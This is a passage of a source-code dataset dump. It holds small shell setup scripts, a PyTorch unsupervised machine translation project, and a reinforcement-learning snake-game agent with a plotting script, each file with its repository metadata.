socketserver.TCPServer((HOST, PORT), MyTCPHandler) as server:\n print('Server listening on {}:{}'.format(HOST, PORT))\n # Activate the server; this will keep running until you\n # interrupt the program with Ctrl-C\n server.serve_forever()\n" }, { "alpha_fraction": 0.6065573692321777, "alphanum_fraction": 0.6065573692321777, "avg_line_length": 14, "blob_id": "0c78edb9839288f9d9e1e1ca2565876e6ab05951", "content_id": "b5135807e3149099c5f1c8b20b9524d894552571", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 61, "license_type": "no_license", "max_line_length": 43, "num_lines": 4, "path": "/bash/myenv/Vm-env/user-env/echo.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"echo.sh works! 
Current dir : \"$PWD\" \"\nls\n\n" }, { "alpha_fraction": 0.6438356041908264, "alphanum_fraction": 0.6438356041908264, "avg_line_length": 11, "blob_id": "934853eff723ee1e03cfd9dd3f6e35f322b37e44", "content_id": "a372d0d5f6ad46aafd63209015bf72734e063597", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 73, "license_type": "no_license", "max_line_length": 27, "num_lines": 6, "path": "/Makefile", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "\nhelp:\n\t@echo 'Usage:'\n\nssh-gen:\n\t$(value my_important_task)\n\t.ONESHELL:\n" }, { "alpha_fraction": 0.6899350881576538, "alphanum_fraction": 0.6948052048683167, "avg_line_length": 24.66666603088379, "blob_id": "d42c5852eb845a027cc9ca53f3dc948bd9855e32", "content_id": "aae5ed22597f36a808730a5270021065f4e9c956", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 616, "license_type": "no_license", "max_line_length": 84, "num_lines": 24, "path": "/bash/myenv/Vm-env/user-env/vim.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nVIM=$(command -v vim) #Checking if vim exists on system\nGIT=$(command -v vim) \n\nif [ ! -f \"$VIM\" ]; then\n echo \"Vim not installed\"\n #sudo yum -y install vim\n exit 1\nfi\n\nif [ ! -f \"$GIT\" ]; then\n echo \"Git not installed\"\n #sudo yum -y install git\n exit 1\nfi\n\necho \"=> Installing vundlevim and plugins\"\nsudo cp . configs/.vimrc ~/.vimrc\nsudo mkdir -p ~/.vim/colors/\nsudo git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim\nsudo wget https://raw.githubusercontent.com/w0ng/vim-hybrid/master/colors/hybrid.vim\nsudo mv hybrid.vim ~/.vim/colors/\nsudo vim +PluginInstall +qall\n" } ]
18
Visonew/unsupervised_mt
https://github.com/Visonew/unsupervised_mt
ff2e93ec6efeb8518f160fbb532a648426b30374
2bd406e283c0cfaed5fd82a0904c7a911aa3d3f9
7d9493651717ac4d32ce21e21a6ff3acde981b08
refs/heads/master
2021-10-24T11:26:15.317361
2019-03-25T15:35:32
2019-03-25T15:35:32
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6140455007553101, "alphanum_fraction": 0.6234012246131897, "avg_line_length": 40.39215850830078, "blob_id": "a73f96bb7936ddf80336794892b6bb6d14d14d92", "content_id": "62fe898be39319b7d0c17bfad9311627aed14d76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8444, "license_type": "no_license", "max_line_length": 122, "num_lines": 204, "path": "/unsupervised_mt/models.py", "repo_name": "Visonew/unsupervised_mt", "src_encoding": "UTF-8", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\n\n\ndef identity(input):\n return input\n\n\nclass Embedding(nn.Module):\n def __init__(self, emb_matrix, requires_grad=True):\n super(Embedding, self).__init__()\n self.embedding = nn.Embedding.from_pretrained(torch.from_numpy(emb_matrix), freeze=not requires_grad)\n self.vocab_size = self.embedding.num_embeddings\n self.embedding_dim = self.embedding.embedding_dim\n\n def forward(self, input):\n return self.embedding(input)\n\n\nclass Encoder(nn.Module):\n def __init__(self, embedding: Embedding, rnn):\n super(Encoder, self).__init__()\n assert embedding.embedding_dim == rnn.input_size\n\n self.embedding = embedding\n self.embedding_dim = embedding.embedding_dim\n self.rnn = rnn\n self.hidden_size = rnn.hidden_size\n\n def forward(self, inputs):\n \"\"\"\n inputs: length x batch_size\n outputs: length x batch_size x hidden_size\n hidden: n_layers x batch_size x hidden_size\n \"\"\"\n outputs, hidden = self.rnn(self.embedding(inputs))\n return outputs, hidden\n\n\nclass DecoderHat(nn.Module):\n def __init__(self, hidden_size, vocab_size, bidirectional=True):\n super(DecoderHat, self).__init__()\n self.hidden_size = 2 * hidden_size if bidirectional else hidden_size\n self.vocab_size = vocab_size\n self.linear = nn.Linear(self.hidden_size, vocab_size)\n self.softmax = nn.LogSoftmax(dim=-1)\n\n def forward(self, input):\n return self.softmax(self.linear(input))\n\n\nclass Attention(nn.Module):\n def __init__(self, embedding_dim, hidden_size, max_length, bidirectional=True):\n \"\"\"\n input: batch_size x vocab_size\n hidden: (1 or 2)*n_layers x batch_size x hidden_size\n encoder_outputs: length (<= max_length) x batch_size x (1 or 2)*hidden_size\n attn_weights: batch_size x 1 x max_length\n attn_applied: batch_size x 1 x (1 or 2)*hidden_size\n\n See figure from https://pytorch.org/tutorials/intermediate/seq2seq_translation_tutorial.html\n \"\"\"\n super(Attention, self).__init__()\n self.embedding_dim = embedding_dim\n self.hidden_size = hidden_size\n self.max_length = max_length\n self.bidirectional = bidirectional\n\n if self.bidirectional:\n self.attn = nn.Linear(2 * self.hidden_size + self.embedding_dim, self.max_length, bias=False)\n self.attn_combine = nn.Linear(self.embedding_dim + 2 * self.hidden_size, self.embedding_dim, bias=False)\n else:\n self.attn = nn.Linear(self.hidden_size + self.embedding_dim, self.max_length, bias=False)\n self.attn_combine = nn.Linear(self.embedding_dim + self.hidden_size, self.embedding_dim, bias=False)\n self.attn_softmax = nn.Softmax(dim=-1)\n self.attn_relu = nn.ReLU()\n\n def forward(self, embedded, hidden, encoder_outputs):\n if self.bidirectional:\n attn_weights = self.attn_softmax(self.attn(torch.cat((hidden[-2], hidden[-1], embedded), dim=1))).unsqueeze(1)\n else:\n attn_weights = self.attn_softmax(self.attn(torch.cat((hidden[-1], embedded), dim=1))).unsqueeze(1)\n length = encoder_outputs.size(0)\n attn_applied = torch.bmm(attn_weights[:, :, :length], 
encoder_outputs.transpose(0, 1))\n return self.attn_relu(self.attn_combine(torch.cat((embedded, attn_applied.squeeze(1)), dim=1)))\n\n\nclass Decoder(nn.Module):\n def __init__(self, embedding: Embedding, attention, rnn, hat: DecoderHat, use_cuda=False):\n super(Decoder, self).__init__()\n assert embedding.embedding_dim == rnn.input_size and \\\n embedding.vocab_size == hat.vocab_size and \\\n attention.embedding_dim == embedding.embedding_dim and \\\n hat.hidden_size == (rnn.bidirectional + 1) * rnn.hidden_size\n\n self.embedding = embedding\n self.embedding_dim = embedding.embedding_dim\n self.attention = attention\n self.rnn = rnn\n self.hidden_size = rnn.hidden_size\n self.hat = hat\n self.use_cuda = use_cuda\n\n def step(self, input, hidden, encoder_outputs):\n \"\"\"\n input: batch_size\n hidden: (1 or 2)*n_layers x batch_size x hidden_size\n encoder_outputs: max_length (<= max_length) x batch_size x (1 or 2)*hidden_size\n embedded: batch_size x embedding_dim\n rnn_input: batch_size x embedding_dim\n output: 1 x batch_size x (1 or 2)*hidden_size\n \"\"\"\n embedded = self.embedding(input)\n rnn_input = self.attention(embedded, hidden, encoder_outputs) if self.attention else embedded\n output, hidden = self.rnn(rnn_input.unsqueeze(0), hidden)\n output = self.hat(output.squeeze(0))\n return output, hidden\n\n def init_input(self, batch_size, sos_index):\n initial_input = torch.full((batch_size,), sos_index, dtype=torch.long)\n initial_input = initial_input.cuda() if self.use_cuda else initial_input\n return initial_input\n\n def forward(self, hidden, encoder_outputs, sos_index,\n targets, teacher_forcing_ratio=0.5):\n \"\"\"\n targets: target_length x batch_size\n \"\"\"\n input = self.init_input(encoder_outputs.size(1), sos_index)\n outputs = []\n for t in range(targets.size(0)):\n output, hidden = self.step(input, hidden, encoder_outputs)\n outputs.append(output.unsqueeze(0))\n if np.random.binomial(1, teacher_forcing_ratio):\n input = targets[t]\n else:\n input = torch.topk(output, k=1)[1].squeeze(-1)\n\n return torch.cat(outputs)\n\n def evaluate(self, hidden, encoder_outputs, sos_index, eos_index, n_iters=None):\n \"\"\"\n hidden: n_layers x batch_size x (1 or 2)*hidden_size\n encoder_outputs: length x batch_size x (1 or 2)*hidden_size\n input: batch_size\n \"\"\"\n input = self.init_input(hidden.size(1), sos_index)\n outputs = []\n ended = np.zeros(hidden.size(1))\n while ~np.all(ended) and n_iters != 0:\n output, hidden = self.step(input, hidden, encoder_outputs)\n outputs.append(output.unsqueeze(0))\n input = torch.topk(output, k=1)[1].squeeze(-1)\n ended += (input == eos_index).cpu().numpy() if self.use_cuda else (input == eos_index).numpy()\n if n_iters is not None:\n n_iters -= 1\n\n return torch.cat(outputs)\n\n\nclass Seq2Seq(nn.Module):\n def __init__(self, encoder_embedding: Embedding, encoder_rnn,\n decoder_embedding: Embedding, attention, decoder_rnn, decoder_hat: DecoderHat,\n use_cuda=False):\n super(Seq2Seq, self).__init__()\n assert encoder_rnn.hidden_size == decoder_rnn.hidden_size and \\\n encoder_rnn.num_layers == decoder_rnn.num_layers and \\\n encoder_rnn.bidirectional == decoder_rnn.bidirectional\n\n self.encoder = Encoder(encoder_embedding, encoder_rnn)\n self.decoder = Decoder(decoder_embedding, attention, decoder_rnn, decoder_hat, use_cuda)\n\n def forward(self, inputs, sos_index, targets, teacher_forcing_ratio=0.5):\n encoder_outputs, hidden = self.encoder(inputs)\n decoder_outputs = self.decoder(hidden, encoder_outputs, sos_index, targets, 
teacher_forcing_ratio)\n return decoder_outputs, encoder_outputs\n\n def evaluate(self, inputs, sos_index, eos_index, n_iters=None):\n encoder_outputs, hidden = self.encoder(inputs)\n decoder_outputs = self.decoder.evaluate(hidden, encoder_outputs, sos_index, eos_index, n_iters)\n return decoder_outputs\n\n\nclass Discriminator(nn.Module):\n def __init__(self, hidden_size, bidirectional):\n super(Discriminator, self).__init__()\n self.hidden_size = 2 * hidden_size if bidirectional else hidden_size\n self.bidirectional = bidirectional\n\n self.layers = nn.Sequential(\n nn.Linear(self.hidden_size, 100), nn.ReLU(),\n nn.Linear(100, 10), nn.ReLU(),\n nn.Linear(10, 1)\n )\n\n def forward(self, encoder_outputs):\n if self.bidirectional:\n hidden = torch.cat((encoder_outputs[-1, :, :self.hidden_size // 2],\n encoder_outputs[0, :, self.hidden_size // 2:]), dim=-1)\n else:\n hidden = encoder_outputs[-1]\n\n return self.layers(hidden)\n" }, { "alpha_fraction": 0.6039456129074097, "alphanum_fraction": 0.6156030297279358, "avg_line_length": 47.766422271728516, "blob_id": "258f45bb149da1bd3e2dd8d4eac57e011eac2177", "content_id": "8ed7b74f8ba2e9c7273fc2679c62f423d5176443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6691, "license_type": "no_license", "max_line_length": 116, "num_lines": 137, "path": "/unsupervised_mt/train.py", "repo_name": "Visonew/unsupervised_mt", "src_encoding": "UTF-8", "text": "from unsupervised_mt.models import Embedding, Encoder, DecoderHat, \\\n Decoder, Seq2Seq, Discriminator, Attention, identity\nfrom unsupervised_mt.losses import translation_loss, classification_loss\nfrom unsupervised_mt.utils import noise, log_probs2indices\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import SGD\n\n\nclass Trainer:\n def __init__(self, frozen_src2tgt: Seq2Seq, frozen_tgt2src: Seq2Seq,\n src_embedding: Embedding, tgt_embedding: Embedding,\n encoder_rnn, decoder_rnn, attention: Attention,\n src_hat: DecoderHat, tgt_hat: DecoderHat, discriminator: Discriminator,\n src_sos_index, tgt_sos_index, src_eos_index, tgt_eos_index, src_pad_index, tgt_pad_index,\n device, lr_core=1e-3, lr_disc=1e-3):\n assert discriminator.hidden_size == (encoder_rnn.bidirectional + 1) * encoder_rnn.hidden_size\n\n self.frozen_src2tgt = frozen_src2tgt\n self.frozen_tgt2src = frozen_tgt2src\n self.src_embedding = src_embedding\n self.tgt_embedding = tgt_embedding\n self.encoder_rnn = encoder_rnn\n self.decoder_rnn = decoder_rnn\n self.attention = attention\n self.src_hat = src_hat\n self.tgt_hat = tgt_hat\n self.core_model = nn.ModuleList([\n self.src_embedding,\tself.tgt_embedding, self.encoder_rnn, self.decoder_rnn,\n self.attention, self.src_hat, self.tgt_hat\n ])\n self.discriminator = discriminator\n self.src_sos_index = src_sos_index\n self.tgt_sos_index = tgt_sos_index\n self.src_eos_index = src_eos_index\n self.tgt_eos_index = tgt_eos_index\n self.src_pad_index = src_pad_index\n self.tgt_pad_index = tgt_pad_index\n self.device = device\n\n self.core_model.to(device)\n self.discriminator.to(device)\n\n use_cuda = device.type == 'cuda'\n self.src2src = Seq2Seq(src_embedding, encoder_rnn, src_embedding, attention, decoder_rnn, src_hat, use_cuda)\n self.src2tgt = Seq2Seq(src_embedding, encoder_rnn, tgt_embedding, attention, decoder_rnn, tgt_hat, use_cuda)\n self.tgt2tgt = Seq2Seq(tgt_embedding, encoder_rnn, tgt_embedding, attention, decoder_rnn, tgt_hat, use_cuda)\n self.tgt2src = Seq2Seq(tgt_embedding, encoder_rnn, src_embedding, attention, 
decoder_rnn, src_hat, use_cuda)\n\n self.core_optimizer = SGD(self.core_model.parameters(), lr=lr_core)\n self.discriminator_optimizer = SGD(self.discriminator.parameters(), lr=lr_disc)\n\n def train_step(self, batch, weights=(1, 1, 1), drop_probability=0.1, permutation_constraint=3):\n batch = {l: t.to(self.device) for l, t in batch.items()}\n\n src2src_dec, src2src_enc = self.src2src(\n noise(batch['src'], self.src_pad_index, drop_probability, permutation_constraint),\n self.src_sos_index, batch['src']\n )\n tgt2tgt_dec, tgt2tgt_enc = self.tgt2tgt(\n noise(batch['tgt'], self.tgt_pad_index, drop_probability, permutation_constraint),\n self.tgt_sos_index, batch['tgt']\n )\n tgt2src_dec, tgt2src_enc = self.tgt2src(\n noise(self.frozen_src2tgt(batch['src']), self.tgt_pad_index, drop_probability, permutation_constraint),\n self.src_sos_index, batch['src']\n )\n src2tgt_dec, src2tgt_enc = self.src2tgt(\n noise(self.frozen_tgt2src(batch['tgt']), self.src_pad_index, drop_probability, permutation_constraint),\n self.tgt_sos_index, batch['tgt']\n )\n\n # autoencoding\n core_loss = weights[0] * (\n translation_loss(src2src_dec, batch['src']) +\n translation_loss(tgt2tgt_dec, batch['tgt'])\n )\n\n # translating\n core_loss += weights[1] * (\n translation_loss(tgt2src_dec, batch['src']) +\n translation_loss(src2tgt_dec, batch['tgt'])\n )\n\n # beating discriminator\n core_loss += weights[2] * (\n classification_loss(self.discriminator(src2src_enc), 'tgt') +\n classification_loss(self.discriminator(tgt2tgt_enc), 'src') +\n classification_loss(self.discriminator(tgt2src_enc), 'src') +\n classification_loss(self.discriminator(src2tgt_enc), 'tgt')\n )\n\n # update core model's parameters\n self.core_optimizer.zero_grad()\n core_loss.backward(retain_graph=True)\n self.core_optimizer.step()\n\n # training discriminator\n discriminator_loss = \\\n classification_loss(self.discriminator(src2src_enc.detach()), 'src') + \\\n classification_loss(self.discriminator(tgt2tgt_enc.detach()), 'tgt') + \\\n classification_loss(self.discriminator(tgt2src_enc.detach()), 'tgt') + \\\n classification_loss(self.discriminator(src2tgt_enc.detach()), 'src')\n\n # update discriminator parameters\n self.discriminator_optimizer.zero_grad()\n discriminator_loss.backward()\n self.discriminator_optimizer.step()\n\n return core_loss.item(), discriminator_loss.item()\n\n def load(self, directory):\n for layer, name in [(self.__getattribute__(name), name)\n for name in ['src_embedding', 'tgt_embedding', 'encoder_rnn', 'decoder_rnn',\n 'attention', 'src_hat', 'tgt_hat', 'discriminator']]:\n layer.load_state_dict(torch.load(directory + name))\n\n def save(self, directory):\n for layer, name in [(self.__getattribute__(name), name)\n for name in ['src_embedding', 'tgt_embedding', 'encoder_rnn', 'decoder_rnn',\n 'attention', 'src_hat', 'tgt_hat', 'discriminator']]:\n torch.save(layer.state_dict(), directory + name)\n\n def predict(self, batch, l1='src', l2='tgt', n_iters=None):\n model = {('src', 'src'): self.src2src, ('src', 'tgt'): self.src2tgt,\n ('tgt', 'src'): self.tgt2src, ('tgt', 'tgt'): self.tgt2tgt}[(l1, l2)]\n sos_index, eos_index = (self.src_sos_index, self.src_eos_index) if l2 == 'src' \\\n else (self.tgt_sos_index, self.tgt_eos_index)\n return log_probs2indices(model.evaluate(batch.to(self.device), sos_index, eos_index, n_iters=n_iters))\n\n def predict_on_test(self, batch_iter, batch_size, visualize, l1='src', l2='tgt', n_iters=None):\n predict = []\n for i in range(0, len(batch_iter.test_ids), batch_size):\n batch = 
batch_iter.load_batch(0, test=True, ids=batch_iter.test_ids[i:i + batch_size])[l1]\n predict += visualize(self.predict(batch, l1=l1, l2=l2, n_iters=n_iters), l2)\n return predict\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6652601957321167, "alphanum_fraction": 0.6793248653411865, "avg_line_length": 39.056339263916016, "blob_id": "c9afffd744bf909325669eb795f5c1b8d99d5855", "content_id": "a15dbfff434901a0fb71958f090129d144976a81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2844, "license_type": "no_license", "max_line_length": 109, "num_lines": 71, "path": "/unsupervised_mt/main.py", "repo_name": "Visonew/unsupervised_mt", "src_encoding": "UTF-8", "text": "from unsupervised_mt.dataset import Dataset\nfrom unsupervised_mt.train import Trainer\nfrom unsupervised_mt.models import Embedding, DecoderHat, Attention, Discriminator\nfrom unsupervised_mt.batch_loader import BatchLoader\nfrom unsupervised_mt.utils import log_probs2indices, noise\n\nimport io\nfrom functools import partial\nimport torch\nimport torch.nn as nn\nfrom tqdm import tqdm\n\n# device\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint('device is {}'.format(device))\n\n# dataset\nds = Dataset(corp_paths=('../data/train.lc.norm.tok.en', '../data/train.lc.norm.tok.fr'),\n emb_paths=('../data/wiki.multi.en.vec', '../data/wiki.multi.fr.vec'),\n pairs_paths=('../data/train_test_src2tgt.npy', '../data/train_test_tgt2src.npy'),\n max_length=20, test_size=0.1)\nprint('finish loading dataset')\n\n# batch iterator\nbatch_iter = BatchLoader(ds)\n\n# models\nhidden_size = 300\nnum_layers = 3\n\nsrc_embedding = Embedding(ds.emb_matrix['src']).to(device)\ntgt_embedding = Embedding(ds.emb_matrix['tgt']).to(device)\nencoder_rnn = nn.GRU(input_size=src_embedding.embedding_dim, hidden_size=hidden_size, num_layers=num_layers,\n bidirectional=True)\ndecoder_rnn = nn.GRU(input_size=src_embedding.embedding_dim, hidden_size=hidden_size, num_layers=num_layers,\n bidirectional=True)\nattention = Attention(src_embedding.embedding_dim, hidden_size, max_length=ds.max_length, bidirectional=True)\nsrc_hat = DecoderHat(2 * hidden_size, ds.vocabs['src'].size)\ntgt_hat = DecoderHat(2 * hidden_size, ds.vocabs['tgt'].size)\ndiscriminator = Discriminator(2 * hidden_size)\n\n# trainer\ntrainer = Trainer(partial(ds.translate_batch_word_by_word, l1='src', l2='tgt'),\n partial(ds.translate_batch_word_by_word, l1='tgt', l2='src'),\n src_embedding, tgt_embedding, encoder_rnn, decoder_rnn, attention, src_hat, tgt_hat,\n discriminator,\n ds.get_sos_index('src'), ds.get_sos_index('tgt'),\n ds.get_eos_index('src'), ds.get_eos_index('tgt'),\n ds.get_pad_index('src'), ds.get_pad_index('tgt'),\n device, lr_core=1e-3, lr_disc=1e-3)\n#trainer.load('../saved_models/final_result1/')\nprint('finish initializing models')\n\n# training\nbatch_size = 30\nnum_steps = 50000\n\ncore_losses = []\ndisc_losses = []\nfor i in tqdm(range(num_steps)):\n core_loss, disc_loss = trainer.train_step(batch_iter.load_batch(batch_size), weights=(1, 1, 1))\n core_losses.append(core_loss)\n disc_losses.append(disc_loss)\n\ntrainer.save('../saved_models/hidden_300/')\n\n# predict\n#predictions = trainer.predict_on_test(batch_iter, batch_size=50, visualize=ds.visualize_batch, n_iters=30)\n#with io.open('predictions', 'w') as f:\n# print(*predictions, sep='\\n', file=f)\n#print('finish predicting')\n" }, { "alpha_fraction": 0.6712132096290588, "alphanum_fraction": 0.6726489663124084, "avg_line_length": 
45.266666412353516, "blob_id": "09f2beced129715ad998615eab9aa06d39ad72d7", "content_id": "32f0316b917db46c313f06113282a71f57bf224b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1393, "license_type": "no_license", "max_line_length": 120, "num_lines": 30, "path": "/unsupervised_mt/batch_loader.py", "repo_name": "Visonew/unsupervised_mt", "src_encoding": "UTF-8", "text": "import numpy as np\nimport torch\nfrom unsupervised_mt.utils import pad_monolingual_batch\n\n\nclass BatchLoader:\n def __init__(self, dataset):\n self.languages = dataset.languages\n self.load_sentence = dataset.load_sentence\n self.train_ids = {l: np.arange(len(dataset.train[l])) for l in self.languages}\n self.test_ids = np.arange(len(dataset.test))\n self.pad_index = {l: dataset.vocabs[l].get_pad(l) for l in self.languages}\n\n def load_raw_monolingual_batch(self, batch_size, language, random_state=None, test=False, ids=None):\n if random_state is not None:\n np.random.seed(random_state)\n\n if ids is None:\n ids = np.random.choice(self.test_ids if test else self.train_ids[language], size=batch_size)\n\n return [self.load_sentence(language, idx, test=test) for idx in ids]\n\n def load_monolingual_batch(self, batch_size, language, random_state=None, test=False, ids=None):\n return torch.tensor(pad_monolingual_batch(\n self.load_raw_monolingual_batch(batch_size, language, random_state, test=test, ids=ids),\n self.pad_index[language]\n ), dtype=torch.long).transpose(0, 1)\n\n def load_batch(self, batch_size, random_state=None, test=False, ids=None):\n return {l: self.load_monolingual_batch(batch_size, l, random_state, test=test, ids=ids) for l in self.languages}\n\n\n\n\n\n" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7936508059501648, "avg_line_length": 30.5, "blob_id": "f0c0b85f0feb6bd11dd63ca5a1519c0489b5b8c0", "content_id": "14173678ed4790428d2fce0796dad92151f59f19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "no_license", "max_line_length": 69, "num_lines": 4, "path": "/README.md", "repo_name": "Visonew/unsupervised_mt", "src_encoding": "UTF-8", "text": "# unsupervised_mt\n\nA code base for experiments in the footsteps of the following article\nhttps://arxiv.org/pdf/1711.00043.pdf\n" } ]
5
Wukwim/RLChina2021-course4
https://github.com/Wukwim/RLChina2021-course4
8eb925fcf7466436ba3cc5cb2162ece52780fc39
574a1a807028732ff5d70126bdfcdec8e236fe8c
552f0e23c62d63a5dec6463d4aa75a65656baf54
refs/heads/main
2023-07-13T13:37:18.922804
2021-08-26T08:56:51
2021-08-26T08:56:51
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5963250398635864, "alphanum_fraction": 0.6150786280632019, "avg_line_length": 28.824859619140625, "blob_id": "496d4d71a096a10a3e09cd06927ae4570330a8cc", "content_id": "38ce1058596c64971e61bab07a305111c75e7a1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5443, "license_type": "no_license", "max_line_length": 92, "num_lines": 177, "path": "/examples/algo/homework/submission.py", "repo_name": "Wukwim/RLChina2021-course4", "src_encoding": "UTF-8", "text": "# # This is homework.\n# # Load your model and submit this to Jidi\n\nimport torch\nimport os\n\n# load critic\nfrom pathlib import Path\nimport sys\n\nbase_dir = Path(__file__).resolve().parent\nsys.path.append(str(base_dir))\nfrom critic import Critic\nimport numpy as np\n\n''' Block1: IQL Build'''\n\n\nclass MultiRLAgents:\n def __init__(self):\n self.agents = list()\n self.n_player = 2\n\n for i in range(self.n_player):\n agent = IQL() # TODO:\n self.agents.append(agent) # 用不同网络怎么办 -- 还是要拆一下\n\n def choose_action_to_env(self, observation, id):\n obs_copy = observation.copy()\n action_from_algo = self.agents[id].choose_action(obs_copy)\n action_to_env = self.action_from_algo_to_env(action_from_algo)\n\n return action_to_env\n\n def action_from_algo_to_env(self, joint_action):\n joint_action_ = []\n for a in range(1):\n action_a = joint_action\n each = [0] * 4\n each[action_a] = 1\n joint_action_.append(each)\n\n return joint_action_\n\n def load(self, file_list):\n for index, agent in enumerate(self.agents):\n agent.load(file_list[index])\n\n\n# TODO\nclass IQL:\n def __init__(self):\n # pass\n self.state_dim = 18\n self.action_dim = 4\n self.hidden_size = 64\n # self.given_net_flag = given_net_flag\n # self.given_net = Critic(self.state_dim, self.action_dim, self.hidden_size)\n\n self.critic_eval = Critic(self.state_dim, self.action_dim, self.hidden_size)\n\n def choose_action(self, observation):\n observation = torch.tensor(observation, dtype=torch.float).view(1, -1)\n action = torch.argmax(self.critic_eval(observation)).item()\n\n return action\n\n def load(self, file):\n # pass\n self.critic_eval.load_state_dict(torch.load(file))\n\n\n# TODO\n\n\n''' Block2: State to Observations '''\n\n\ndef get_surrounding(state, width, height, x, y):\n surrounding = [state[(y - 1) % height][x], # up\n state[(y + 1) % height][x], # down\n state[y][(x - 1) % width], # left\n state[y][(x + 1) % width]] # right\n\n return surrounding\n\n\ndef make_grid_map(board_width, board_height, beans_positions: list, snakes_positions: dict):\n snakes_map = [[[0] for _ in range(board_width)] for _ in range(board_height)]\n for index, pos in snakes_positions.items():\n for p in pos:\n snakes_map[p[0]][p[1]][0] = index\n\n for bean in beans_positions:\n snakes_map[bean[0]][bean[1]][0] = 1\n\n return snakes_map\n\n\ndef get_observations(state, id, obs_dim):\n state_copy = state.copy()\n board_width = state_copy['board_width']\n board_height = state_copy['board_height']\n beans_positions = state_copy[1]\n snakes_positions = {key: state_copy[key] for key in state_copy.keys() & {2, 3, 4, 5, 6}}\n snakes_positions_list = []\n for key, value in snakes_positions.items():\n snakes_positions_list.append(value)\n snake_map = make_grid_map(board_width, board_height, beans_positions, snakes_positions)\n state = np.array(snake_map)\n state = np.squeeze(snake_map, axis=2)\n\n observations = np.zeros((1, obs_dim)) # todo\n snakes_position = np.array(snakes_positions_list, dtype=object)\n 
beans_position = np.array(beans_positions, dtype=object).flatten()\n agents_index = [id]\n for i, element in enumerate(agents_index):\n # # self head position\n observations[i][:2] = snakes_positions_list[element][0][:]\n\n # head surroundings\n head_x = snakes_positions_list[element][0][1]\n head_y = snakes_positions_list[element][0][0]\n\n head_surrounding = get_surrounding(state, board_width, board_height, head_x, head_y)\n observations[i][2:6] = head_surrounding[:]\n\n # beans positions\n observations[i][6:16] = beans_position[:]\n\n # other snake positions # todo: to check\n snake_heads = np.array([snake[0] for snake in snakes_position])\n snake_heads = np.delete(snake_heads, element, 0)\n observations[i][16:] = snake_heads.flatten()[:]\n\n return observations.squeeze().tolist()\n\n\n# todo\n''' Block3: Load your model '''\n# Once start to train, u can get saved model. Here we just say it is critic.pth.\ncritic_net_0 = os.path.dirname(os.path.abspath(__file__)) + '/critic_0_30000.pth'\ncritic_net_1 = os.path.dirname(os.path.abspath(__file__)) + '/critic_1_30000.pth'\n# 不共享网络就加载两套不一样的 共享就加载两套一样的\n\ncritic_list = [critic_net_0, critic_net_1]\n\nagent = MultiRLAgents()\nagent.load(critic_list)\n\nn_player = 2\n# todo\n''' observation 是一个agent的state 状态信息 包含以下内容 -- \nobservation = \n{1: [[2, 1], [5, 6], [2, 6], [1, 7], [5, 0]], \n 2: [[0, 5], [0, 6], [0, 7]], \n 3: [[3, 0], [3, 7], [3, 6]], \n 'board_width': 8, \n 'board_height': 6, \n 'last_direction': None, \n 'controlled_snake_index': 2\n}\n'''\n\n\n# 对一条蛇的观测 输出这条蛇的动作\ndef my_controller(observation, action_space, is_act_continuous=False):\n # obs = observation['obs']\n obs = observation\n o_index = obs['controlled_snake_index']\n o_index -= 2 # 看看observation里面的'controlled_snake_index'和我们蛇的索引正好差2\n\n obs = get_observations(observation, o_index, 18)\n\n action_ = agent.choose_action_to_env(obs, o_index)\n\n return action_\n" }, { "alpha_fraction": 0.5183927416801453, "alphanum_fraction": 0.5625353455543518, "avg_line_length": 23.60869598388672, "blob_id": "150070d0e256fd7c56abc950e4d838cb80f838e5", "content_id": "db1ed70bd82d0948ce931ea4e6d060d409058981", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1827, "license_type": "no_license", "max_line_length": 74, "num_lines": 69, "path": "/examples/plot.py", "repo_name": "Wukwim/RLChina2021-course4", "src_encoding": "UTF-8", "text": "import os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.pyplot import MultipleLocator\r\n\r\nplot_freq = 500\r\nx_min = 0\r\nx_max = 35000\r\ny_min = 60\r\ny_max = 300\r\n\r\n# 解决中文显示问题\r\nfont1 = {'family': 'SimHei',\r\n 'weight': 'normal',\r\n 'size': 14}\r\nfont = {'family': 'Times New Roman',\r\n 'weight': 'normal',\r\n 'size': 16}\r\nlabelsize = 13\r\n\r\nif os.path.exists('Gt.txt'):\r\n f1 = open('Gt.txt', \"r\")\r\n lines1 = f1.readlines()\r\n a1 = []\r\n for line in lines1:\r\n a1.append(float(line))\r\n # 重组数组\r\n a10 = np.array(a1)\r\n print('Episode:', len(a1))\r\n\r\n # 数组舍弃余数重组\r\n rest1 = len(a10) % plot_freq\r\n for i in range(rest1):\r\n a10 = np.delete(a10, len(a10) - rest1)\r\n len(a1) * plot_freq + rest1,\r\n a10 = a10.reshape(-1, plot_freq)\r\n a1 = a10.mean(axis=1)\r\n\r\n plt.figure(1)\r\n num1 = list(range(len(a1)))\r\n reward_list = []\r\n for num in num1:\r\n num *= plot_freq\r\n reward_list.append(num)\r\n plt.axis([0, x_max, y_min, y_max])\r\n # plt.grid(linestyle='-.')\r\n # plt.xlabel('episodes', font)\r\n # 